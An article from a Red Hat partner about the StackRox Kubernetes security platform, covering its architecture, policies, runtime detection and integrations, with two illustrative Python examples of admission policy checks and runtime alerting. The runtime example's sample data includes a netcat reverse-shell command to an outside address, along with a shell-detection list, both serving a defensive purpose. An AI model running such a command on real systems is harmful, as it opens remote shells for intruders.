Red Hat StackRox Security – Securing Cloud-Native Applications and Containers

09 Apr 2021

Prepared by: Kerem Çeliker / Software Defined X (SDX) Business Unit

Sekom | Red Hat StackRox Security – Securing Cloud-Native Applications and Containers

In January 2021, Red Hat announced its acquisition of California-based Kubernetes security company StackRox, founded in 2014. This move is considered one of the most strategic acquisitions for Red Hat, aiming to strengthen its position in the DevSecOps security market within enterprise infrastructure.

StackRox complements Red Hat's existing portfolio with container and Kubernetes security capabilities that its platform offerings previously lacked.

DevSecOps, the combination of DevOps and security operations, is becoming a top priority for enterprise customers. Through its integration with existing DevOps and CI/CD tools, StackRox delivers DevSecOps coverage for Kubernetes and the OpenShift platform across the build, deploy, and runtime phases.

What Sets StackRox Apart?

Since its inception, StackRox has focused on securing software and ensuring business continuity. As containers and Kubernetes rapidly gained momentum and became an industry standard, the company swiftly doubled down on its Kubernetes Security Platform.

What distinguishes StackRox on Red Hat OpenShift and Kubernetes is the tightness of its integration. While competitors mainly apply traditional, host-centric security approaches, StackRox builds on the core objects and native workflows of OpenShift and Kubernetes (deployments, namespaces, network policies, admission control) to provide an end-to-end solution for CI/CD, DevOps, and DevSecOps processes across the entire Kubernetes platform.

With its contextual risk insight, StackRox delivers vulnerability data, severity assessments with CVSS-based scoring, and remediation recommendations for images and running deployments across all Kubernetes components, so that users have timely and actionable security intelligence.

StackRox correlates image scan results from public vulnerability databases with the configuration and event data it collects from Red Hat OpenShift and Kubernetes components to identify security weaknesses. Through its Kubernetes-native sensors and admission control, it can block misconfigured components, risky integrations, and non-compliant internal or external deployments where policy requires it.

For runtime network analysis, traffic visualization, and network policy recommendations, it works alongside Istio in Kubernetes clusters and the Istio-based Service Mesh in Red Hat OpenShift.

Using the OpenShift and Kubernetes APIs, StackRox runs compliance checks against the CIS benchmarks, NIST, PCI DSS, and HIPAA and exposes the results through its web console and API, so distributed workloads can be audited automatically.

StackRox brings end-to-end security and visibility to OpenShift through native integration with CRI-O (the Container Runtime Interface implementation that OpenShift uses), OpenShift SDN (the CNI network plugin), and the Istio-based OpenShift Service Mesh.

StackRox Provides Full Integration for Hybrid and Multi-Cloud Environments

Red Hat has long recognized the need to manage cluster lifecycles and workloads for applications running in non-OpenShift environments such as Amazon EKS, Microsoft AKS, Google GKE, and IBM Cloud Kubernetes Service (IKS).

Following the acquisition by IBM, Red Hat turned IBM Multicloud Manager into an open-source project, rebranding and modernizing it as Red Hat Advanced Cluster Management for Kubernetes (ACM), which manages both Kubernetes and Red Hat OpenShift clusters. This evolution now enables comprehensive solutions for u

StackRox Platform Architecture and How It Works

The StackRox Kubernetes-Native Security Platform operates under three core components:

  • StackRox Central
  • StackRox Sensor
  • StackRox Collector

StackRox Central

StackRox Central serves as the command center, the brain of the operation. It hosts the user interface and the API server, runs the image scanner, performs data analytics and policy evaluation, and manages integrations with third-party tools and solutions. It is also the hub where alerts and notifications are defined and webhook integrations are configured.

StackRox Sensor

StackRox Sensor runs once per cluster as a Deployment, while Collector runs on every node as a DaemonSet. Sensor watches cluster objects through the Kubernetes API with read-only (list/watch) permissions for inventory; it needs write access to your Red Hat OpenShift or Kubernetes cluster only when enforcement is enabled, and then only the narrow rights to delete a pod or scale a deployment and to act as an admission controller. With this minimal footprint, Sensor and Collector act as anomaly and attack detection controllers that can stop threats in real time.

Policies applied to Red Hat OpenShift and Kubernetes clusters are either StackRox's built-in defaults or customer-defined. StackRox ships more than 60 default policies that are updated regularly, and it supplements these rules with per-deployment process baselines learned from observed runtime activity, which keeps the sensors' detection capability evolving with the workloads.
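To make the policy model concrete, here is an added example, written for this article and not StackRox's own code or policy format, of how deploy-time policies like the ones described above (and the CIS-style configuration checks mentioned in the compliance section) are evaluated against a Deployment manifest. The policy names, severities, enforcement flags, and the two sample manifests are all constructed for illustration; StackRox's real policy schema and default policy set differ.

```python
"""Deploy-time policy evaluation over Kubernetes Deployment manifests.

Added example, not StackRox code. Policies and manifests are constructed.
"""
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class Violation:
    policy: str
    severity: str
    scope: str          # "pod" or the name of the offending container
    message: str


@dataclass
class Policy:
    name: str
    severity: str                   # LOW, MEDIUM, HIGH or CRITICAL (assumed scale)
    enforce: bool                   # True: reject at admission; False: alert only
    scope: str                      # "pod" or "container"
    check: Callable[[dict], str]    # returns a reason, or "" when compliant


def _sc(obj: dict) -> dict:
    return obj.get("securityContext") or {}


def privileged(c: dict) -> str:
    return "container runs privileged" if _sc(c).get("privileged") else ""


def may_run_as_root(c: dict) -> str:
    sc = _sc(c)
    if sc.get("runAsNonRoot") is True or sc.get("runAsUser", 0) != 0:
        return ""
    return "runAsNonRoot not set and runAsUser is 0 or unset"


def mutable_image_ref(c: dict) -> str:
    image = c.get("image", "")
    if "@sha256:" in image:
        return ""                                   # digest-pinned, immutable
    name = image.rsplit("/", 1)[-1]
    if ":" not in name or name.endswith(":latest"):
        return f"image {image!r} has no tag or uses 'latest'"
    return ""


def missing_limits(c: dict) -> str:
    limits = (c.get("resources") or {}).get("limits") or {}
    missing = [r for r in ("cpu", "memory") if r not in limits]
    return f"no {'/'.join(missing)} limit" if missing else ""


def host_namespaces(pod: dict) -> str:
    used = [k for k in ("hostPID", "hostIPC", "hostNetwork") if pod.get(k)]
    return f"shares host namespaces: {', '.join(used)}" if used else ""


# Constructed rule set, loosely modelled on CIS Kubernetes Benchmark items.
POLICIES = [
    Policy("Privileged Container", "CRITICAL", True, "container", privileged),
    Policy("Host Namespace Access", "HIGH", True, "pod", host_namespaces),
    Policy("Container Runs as Root", "MEDIUM", False, "container", may_run_as_root),
    Policy("Latest or Untagged Image", "MEDIUM", False, "container", mutable_image_ref),
    Policy("No Resource Limits", "LOW", False, "container", missing_limits),
]


def evaluate(deployment: dict, policies: List[Policy] = POLICIES) -> List[Violation]:
    """Run every policy against the pod template; container policies cover init containers too."""
    pod = deployment["spec"]["template"]["spec"]
    found: List[Violation] = []
    for p in policies:
        if p.scope == "pod":
            reason = p.check(pod)
            if reason:
                found.append(Violation(p.name, p.severity, "pod", reason))
        else:
            for c in pod.get("containers", []) + pod.get("initContainers", []):
                reason = p.check(c)
                if reason:
                    found.append(Violation(p.name, p.severity, c["name"], reason))
    return found


def admission_decision(violations: List[Violation],
                       policies: List[Policy] = POLICIES) -> Tuple[bool, List[str]]:
    """Admission step: one violation of an enforced policy is enough to reject the deployment."""
    enforced = {p.name for p in policies if p.enforce}
    blocking = [f"{v.policy} ({v.scope}): {v.message}" for v in violations if v.policy in enforced]
    return (not blocking, blocking)


# Constructed sample manifests: one risky, one hardened.
RISKY = {"kind": "Deployment", "metadata": {"name": "payments", "namespace": "shop"},
         "spec": {"template": {"spec": {
             "hostPID": True,
             "containers": [{"name": "api",
                             "image": "registry.example.com/shop/payments:latest",
                             "securityContext": {"privileged": True}}]}}}}

HARDENED = {"kind": "Deployment", "metadata": {"name": "payments", "namespace": "shop"},
            "spec": {"template": {"spec": {"containers": [{
                "name": "api",
                "image": "registry.example.com/shop/payments@sha256:" + "a" * 64,
                "securityContext": {"privileged": False, "runAsNonRoot": True, "runAsUser": 10001},
                "resources": {"limits": {"cpu": "500m", "memory": "256Mi"}}}]}}}}

if __name__ == "__main__":
    for label, d in (("risky", RISKY), ("hardened", HARDENED)):
        vs = evaluate(d)
        allowed, _ = admission_decision(vs)
        print(f"{label}: {len(vs)} violation(s), admission {'ALLOWED' if allowed else 'DENIED'}")
        for v in vs:
            print(f"  [{v.severity}] {v.policy} @ {v.scope}: {v.message}")
```

The `enforce` flag models the split between alert-only policies and policies enforced at admission time: the risky manifest trips five rules, but only the two enforced ones (privileged container and host namespace access) cause the deployment to be rejected; the rest are reported for follow-up.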

StackRox Collector

One Collector is deployed per node. Collector can run in one of two modes, chosen by the user:

  • eBPF mode: Collector uses extended Berkeley Packet Filter probes to capture process executions and network connections from the kernel. In this mode it continuously streams these events to Sensor, which preserves them for forensic analysis.
  • Kernel module mode: For nodes with older Linux kernels that lack the required eBPF support, Collector loads a kernel module instead. It gathers the same per-node data and sends it back to the correlation pool in Sensor.

Along this path, activity from all Red Hat OpenShift and Kubernetes clusters is correlated. Each Collector forwards its events to the Sensor on its own cluster, which enriches them with Kubernetes context (namespace, deployment, pod, container) and forwards them to StackRox Central. Central correlates data from all clusters, evaluates the rules, permission requirements, and controls that apply, and sends any resulting enforcement actions back to Sensor, which applies them through the Kubernetes API.

Active Threat Response Workflow in StackRox

If malicious activity occurs within a specific pod or code component of a Deployment, the priority is to avoid disrupting the rest of the system. StackRox does not hook the system call table, block individual system calls, or terminate individual processes in place; its response is applied at the Kubernetes level to the affected pod. This keeps the threat response targeted and leaves other system components unaffected.

Incident Handling and Forensics in StackRox

In such an incident, StackRox can instruct OpenShift or Kubernetes to kill the affected pod, after which the owning controller creates a fresh replacement. While the StackRox Collector is running, it keeps gathering forensic and investigative data on the processes, system calls, and network connections in the cluster, so the evidence outlives the pod.

The collected data is encrypted in transit (the StackRox components authenticate each other with mutual TLS) and stored centrally, where it appears in the central violations view or is exported to other applications such as a SIEM. This enables forensic analysis to be conducted later if necessary and provides actionable insight based on predefined rules to respond effectively to threats.
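As an added example, not StackRox code, the following script models the Collector to Sensor to Central path described above on a constructed stream of process-execution events: Sensor enriches each event with Kubernetes context, Central learns a per-deployment process baseline during an observation window and then raises alerts for anything outside it, and enforcement comes back as a pod-level delete rather than a blocked system call. The container index, the event sample, the policy names, the learning window, and the `delete_pod` action are all assumptions made for this example.

```python
"""Runtime detection pipeline modelled on the Collector -> Sensor -> Central flow.

Added example, not StackRox code. All data below is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# What Sensor would know from the Kubernetes API: container ID -> workload context (constructed).
CONTAINER_INDEX = {
    "c1": {"namespace": "shop", "pod": "payments-7d9f-abc12", "deployment": "payments", "container": "api"},
    "c2": {"namespace": "shop", "pod": "payments-7d9f-def34", "deployment": "payments", "container": "api"},
}


@dataclass(frozen=True)
class Event:
    """A process-execution event as Collector would report it from a node."""
    ts: float
    node: str
    container_id: str
    exe: str
    args: str


@dataclass
class Alert:
    """A violation plus the forensic context an investigator needs later."""
    policy: str
    severity: str
    namespace: str
    pod: str
    deployment: str
    exe: str
    args: str
    ts: float
    enforcement: Optional[str]   # None = alert only, "KILL_POD" = pod-level enforcement


def enrich(ev: Event, index: Dict[str, dict] = CONTAINER_INDEX) -> Optional[dict]:
    """Sensor step: attach namespace/deployment/pod; events for unknown containers are dropped."""
    ctx = index.get(ev.container_id)
    return None if ctx is None else {**ctx, "event": ev}


class Central:
    """Central step: baseline learning, policy evaluation, enforcement decision."""

    def __init__(self, learning_window: float = 60.0,
                 shells: Tuple[str, ...] = ("/bin/sh", "/bin/bash", "/bin/dash")):
        self.window = learning_window
        self.shells = set(shells)
        self.first_seen: Dict[str, float] = {}                   # deployment -> first event ts
        self.baseline: Dict[str, Set[str]] = defaultdict(set)    # deployment -> observed executables

    def process(self, ctx: dict) -> Optional[Alert]:
        ev: Event = ctx["event"]
        key = f"{ctx['namespace']}/{ctx['deployment']}"
        start = self.first_seen.setdefault(key, ev.ts)
        base = dict(namespace=ctx["namespace"], pod=ctx["pod"], deployment=ctx["deployment"],
                    exe=ev.exe, args=ev.args, ts=ev.ts)
        # Rule 1: a shell inside a container is always a violation and is enforced by
        # killing the pod; the owning controller then schedules a clean replacement.
        if ev.exe in self.shells:
            return Alert("Shell Spawned in Container", "HIGH", enforcement="KILL_POD", **base)
        # Learning window: record what the deployment normally runs and raise nothing.
        if ev.ts - start < self.window:
            self.baseline[key].add(ev.exe)
            return None
        # Rule 2: once the baseline is locked, any new executable is reported (alert only).
        if ev.exe not in self.baseline[key]:
            return Alert("Unauthorized Process Execution", "MEDIUM", enforcement=None, **base)
        return None


def run_pipeline(events: List[Event], central: Central) -> Tuple[List[Alert], List[dict]]:
    """Drive events through Sensor enrichment and Central; return alerts and enforcement actions."""
    alerts: List[Alert] = []
    actions: List[dict] = []
    for ev in sorted(events, key=lambda e: e.ts):
        ctx = enrich(ev)
        if ctx is None:
            continue
        alert = central.process(ctx)
        if alert is None:
            continue
        alerts.append(alert)
        if alert.enforcement == "KILL_POD":
            actions.append({"action": "delete_pod", "namespace": alert.namespace, "pod": alert.pod})
    return alerts, actions


# Constructed event stream: normal start-up, then a reverse-shell attempt in one pod.
SAMPLE_EVENTS = [
    Event(0.0, "node-a", "c1", "/usr/bin/python3", "app.py"),
    Event(5.0, "node-b", "c2", "/usr/bin/python3", "app.py"),
    Event(10.0, "node-a", "c1", "/usr/bin/curl", "http://api.internal/health"),
    Event(100.0, "node-b", "c2", "/usr/bin/python3", "worker.py"),
    Event(120.0, "node-a", "c1", "/usr/bin/nc", "-e /bin/sh 203.0.113.7 4444"),
    Event(125.0, "node-a", "c1", "/bin/sh", "-c id"),
    Event(130.0, "node-c", "zz", "/bin/sh", "-c whoami"),   # unknown container: dropped by Sensor
]

if __name__ == "__main__":
    found, todo = run_pipeline(SAMPLE_EVENTS, Central(learning_window=60.0))
    for a in found:
        print(f"[{a.severity}] {a.policy}: {a.namespace}/{a.pod} ran {a.exe} {a.args} at t={a.ts}")
    print("enforcement actions:", todo)
```

The shell rule is checked before the learning window, so a shell seen during start-up is reported rather than silently baselined. The alert keeps the full argument string (the `-e /bin/sh ... 4444` here) and the pod name, which is exactly what an investigator needs once the pod itself has been killed and replaced.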

Three Key Characteristics of StackRox: Detect, Prevent, and Respond

  1. Attack Visibility : Through the deployed sensors and collectors, the product continuously monitors millions of signals, detects abnormal activity in each container at runtime, and can mitigate threats immediately.
  2. Kill-Chain Analysis : By correlating runtime events chronologically, the product reconstructs how an attacker gained access, moved through the environment, and launched attacks, supporting deep root cause analysis.
  3. Threat Prevention : The product limits the impact of threats by automatically blocking, isolating, or containing them.

Features of StackRox Kubernetes-Native Security Platform

  • Asset Visibility : Discovers all containers within a cluster and groups services in applications to provide a comprehensive view of assets for threat detection.
  • Threat Visibility : Creates an extensive threat monitoring network by continuously monitoring file systems, network communications, processes, and container-related events, providing low-noise data for threat detection.
  • Operational Visibility : Monitors communications across all containers, supplying valid data sources for anomaly detection and identification.
  • Extended Monitoring Scope : Monitoring is conducted across five dimensions: Initial Access, Privilege Escalation, Persistence, Lateral Movement, and Targets.
  • Automated Baseline Learning : Builds and updates per-deployment behavioral baselines automatically from observed container activity.
  • Automated Remediation and Response : Automatically responds to detected threats by blocking non-compliant deployments at admission, killing the affected pod, or isolating affected containers.
  • Policy Customization : While StackRox provides pre-configured common templates, users can also customize protection policies according to their specific workflows.
  • Alert Context : Provides detailed context to inform decision-making in response to security incidents.
  • Intuitive Interface : Ensures quick setup, configuration, and user-friendly management.
  • Independent Integration : Supports adaptation and full integration with various platforms, including DevOps, CI/CD orchestration, automation tools, and PaaS/SaaS/IaaS.
  • Insightful Reporting : Offers risk assessment and forecasting based on comprehensive security data, including vulnerability analysis, detailed configurations, and network and Central Cluster insights.

StackRox can be driven through its web interface, its command-line tool (roxctl), and its API. StackRox Detect and Respond supports the platforms and tools listed below.

Container Platform: Red Hat OpenShift, Kubernetes, Docker Enterprise Edition, IBM Bluemix Container Service, IBM Cloud Kubernetes Service (IKS), Amazon Elastic Kubernetes Service (EKS), Azure Kubernetes Service (AKS), Google Kubernetes Engine (GKE), Mesosphere DC/OS
Operating System: Red Hat Enterprise Linux (RHEL), Ubuntu, CentOS (soon Rocky Linux), and Debian
IaaS: OpenStack, Oracle Cloud, virtual machines (KVM, Hyper-V, VMware, Citrix Xen), Amazon Web Services (AWS), Google Cloud Platform (GCP), IBM Bluemix or IBM Z, Microsoft Azure, and bare metal
Image Scanners: Red Hat StackRox Scanner, Red Hat Quay, Clair, Docker Trusted Registry, Anchore, Tenable, Google Container Analysis
Image Registries: Red Hat Quay, Docker Hub, Tenable, Sonatype Nexus, JFrog Artifactory, GitHub/GitLab Container Registry, Amazon Elastic Container Registry (ECR), Azure Container Registry (ACR), Docker Trusted Registry (DTR), Google Container Registry (GCR)
CI/CD Tools: OpenShift Pipelines (Tekton), Jenkins, GitLab, Bamboo, CircleCI, TeamCity
Identity Management: SAML 2.0-compliant identity providers including Google, Okta, Ping Identity, and more
SIEM and Ticketing: Sumo Logic, Google Cloud Security Command Center, Jira Software
Event Alerting: Splunk, PagerDuty, Slack, Teams, Discord, and more

Red Hat StackRox breaks down operational barriers between Software Developers, DevOps/DevSecOps, and Security teams, enabling seamless collaboration throughout development and operations.
